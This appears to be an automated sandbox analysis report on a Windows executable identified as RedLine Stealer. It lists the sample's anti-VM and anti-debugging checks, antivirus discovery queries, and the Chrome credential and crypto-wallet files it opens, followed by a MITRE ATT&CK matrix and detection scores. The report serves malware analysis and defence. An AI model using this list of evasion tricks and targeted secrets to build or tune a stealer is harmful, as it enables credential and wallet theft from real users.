                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeWindow / User API: threadDelayed 2405
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_0012B028 sldt word ptr [eax]
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0040290B FindFirstFileW,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeSystem information queried: ModuleInformation
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405703001.000000000432A000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405605442.0000000002A40000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.587073921.0000000000979000.00000004.00000020.sdmpBinary or memory string: VMware
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.587073921.0000000000979000.00000004.00000020.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareEGOO3369Win32_VideoController_T9WFHGGVideoController120060621000000.000000-0004.724058display.infMSBDADA6EFYGRPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsE5VS2XYCl
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405703001.000000000432A000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405703001.000000000432A000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405703001.000000000432A000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405703001.000000000432A000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: vmicvss
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.587048785.0000000000956000.00000004.00000020.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587037416.000000000094B000.00000004.00000020.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587007399.00000000008F8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405605442.0000000002A40000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405703001.000000000432A000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405703001.000000000432A000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405703001.000000000432A000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

                        Anti Debugging:

                        barindex
                        Hides threads from debuggersShow sources
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_72E41BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294782B mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294907F mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294951D mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294A152 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029486FB LdrInitializeThunk,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeMemory allocated: page read and write | page guard
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess created: C:\Users\user\Desktop\GR8jRQeRUr.exe "C:\Users\user\Desktop\GR8jRQeRUr.exe"
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.592231521.00000000216FB000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587007399.00000000008F8000.00000004.00000020.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                        Stealing of Sensitive Information:

                        barindex
                        Yara detected RedLine StealerShow sources
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e490ee8.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e210f6e.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e210f6e.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e490000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e680000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e210086.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e490ee8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e680000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e210086.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e490000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000F.00000002.590456261.000000001E680000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000003.523823007.000000000098B000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.590191064.000000001E490000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.589866449.000000001E1D0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: GR8jRQeRUr.exe PID: 6312, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Tries to steal Crypto Currency WalletsShow sources
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Found many strings related to Crypto-Wallets (likely being stolen)Show sources
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.591127609.000000001E9E5000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Electrum\wallets
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.591127609.000000001E9E5000.00000004.00000001.sdmpString found in binary or memory: Yl1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.591127609.000000001E9E5000.00000004.00000001.sdmpString found in binary or memory: Yl-cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.587073921.0000000000979000.00000004.00000020.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.591127609.000000001E9E5000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Ethereum\wallets
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.587073921.0000000000979000.00000004.00000020.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.591127609.000000001E9E5000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Ethereum\wallets
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.587073921.0000000000979000.00000004.00000020.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                        Tries to harvest and steal browser information (history, passwords, etc)Show sources
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: Yara matchFile source: 0000000F.00000002.591069977.000000001E985000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: GR8jRQeRUr.exe PID: 6312, type: MEMORYSTR

                        Remote Access Functionality:

                        barindex
                        Yara detected RedLine StealerShow sources
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e490ee8.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e210f6e.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e210f6e.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e490000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e680000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e210086.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e490ee8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e680000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e210086.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e490000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000F.00000002.590456261.000000001E680000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000003.523823007.000000000098B000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.590191064.000000001E490000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.589866449.000000001E1D0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: GR8jRQeRUr.exe PID: 6312, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid AccountsWindows Management Instrumentation221Path InterceptionAccess Token Manipulation1Masquerading1OS Credential Dumping1Security Software Discovery531Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
                        Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection11Disable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Local System3Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion441Security Account ManagerVirtualization/Sandbox Evasion441SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection11LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol111Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Information Discovery126VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        GR8jRQeRUr.exe13%VirustotalBrowse
                        GR8jRQeRUr.exe16%ReversingLabsWin32.Trojan.Shelsy

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll2%VirustotalBrowse
                        C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll3%MetadefenderBrowse
                        C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll0%ReversingLabs

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://service.r0%URL Reputationsafe
                        http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                        http://tempuri.org/0%URL Reputationsafe
                        http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id90%URL Reputationsafe
                        http://tempuri.org/Entity/Id80%URL Reputationsafe
                        http://tempuri.org/Entity/Id50%URL Reputationsafe
                        http://tempuri.org/Entity/Id40%URL Reputationsafe
                        http://tempuri.org/Entity/Id70%URL Reputationsafe
                        http://tempuri.org/Entity/Id60%URL Reputationsafe
                        http://tempuri.org/Entity/Id19Response0%URL Reputationsafe
                        http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                        http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                        http://support.a0%URL Reputationsafe
                        http://tempuri.org/Entity/Id6Response0%URL Reputationsafe
                        https://api.ip.sb/ip0%URL Reputationsafe
                        http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id200%URL Reputationsafe
                        http://tempuri.org/Entity/Id210%URL Reputationsafe
                        http://tempuri.org/Entity/Id220%URL Reputationsafe
                        http://tempuri.org/Entity/Id230%URL Reputationsafe
                        http://tempuri.org/Entity/Id240%URL Reputationsafe
                        http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
                        http://forms.rea0%URL Reputationsafe
                        http://tempuri.org/Entity/Id100%URL Reputationsafe
                        http://tempuri.org/Entity/Id110%URL Reputationsafe
                        http://tempuri.org/Entity/Id120%URL Reputationsafe
                        http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id130%URL Reputationsafe
                        http://tempuri.org/Entity/Id140%URL Reputationsafe
                        http://tempuri.org/Entity/Id150%URL Reputationsafe
                        http://tempuri.org/Entity/Id160%URL Reputationsafe
                        http://tempuri.org/Entity/Id170%URL Reputationsafe
                        http://tempuri.org/Entity/Id180%URL Reputationsafe
                        http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id190%URL Reputationsafe
                        http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id8Response0%URL Reputationsafe

                        Domains and IPs

                        Contacted Domains

                        No contacted domains info

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2005/02/sc/sctGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                            		high
                            https://duckduckgo.com/chrome_newtabGR8jRQeRUr.exe, 0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591029105.000000001E96F000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590648971.000000001E7EA000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590799521.000000001E8AE000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591267383.000000001EAB0000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591318944.000000001EAFB000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583560791.000000001F89D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583621640.000000001F90F000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591722392.000000001F7DA000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583684692.000000001F980000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591069977.000000001E985000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591648322.000000001F769000.00000004.00000001.sdmpfalse
                              		high
                              http://service.rGR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                		high
                                https://duckduckgo.com/ac/?q=GR8jRQeRUr.exe, 0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591029105.000000001E96F000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590648971.000000001E7EA000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590799521.000000001E8AE000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591267383.000000001EAB0000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591318944.000000001EAFB000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583560791.000000001F89D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583621640.000000001F90F000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591722392.000000001F7DA000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583684692.000000001F980000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591069977.000000001E985000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591648322.000000001F769000.00000004.00000001.sdmpfalse
                                  		high
                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                    		high
                                    http://tempuri.org/Entity/Id12ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591069977.000000001E985000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://tempuri.org/GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://tempuri.org/Entity/Id2ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                      		high
                                      http://tempuri.org/Entity/Id21ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                        		high
                                        http://tempuri.org/Entity/Id9GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
